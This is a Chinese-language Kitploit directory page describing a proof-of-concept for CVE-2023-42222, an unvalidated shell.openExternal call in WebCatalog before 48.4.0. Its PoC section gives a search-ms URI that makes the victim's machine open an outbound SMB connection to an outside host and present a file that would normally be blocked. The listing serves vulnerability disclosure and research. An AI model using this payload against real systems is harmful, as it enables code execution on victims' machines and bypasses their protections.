Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-42222 — CVE-2023-42222在WebCatalog中的概念验证利用,演示了通过Electron的shell.openExternal实现任意URL执行,以绕过安全保护并执行代码。 | Kitploit
工具/GitHubGitHub/itssixtyn3in/cve-2023-42222
漏洞分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubitssixtyn3in/cve-2023-42222

CVE-2023-42222

CVE-2023-42222在WebCatalog中的概念验证利用,演示了通过Electron的shell.openExternal实现任意URL执行,以绕过安全保护并执行代码。

查看仓库
3122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-42222

漏洞摘要

在某些情况下,WebCatalog 48.4.0 之前的版本会在未验证 URL 是否为 http 或 https 资源的情况下调用 Electron 的 shell.openExternal 函数。此漏洞允许攻击者通过发送包含任意协议链接的消息在受害者机器上执行代码。受害者需要与链接进行交互,并且会看到打开的 URL。

漏洞扫描输出

SAST

PoC 概述

PoC

PoC 信息

该漏洞可以通过同步一个允许任意URL的页面来确认。如果同步的网站包含 search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools,则会创建一个外部 SMB 连接。这可用于绕过本地机器的安全保护措施,并向用户呈现通常会被阻止的恶意文件。

下载工具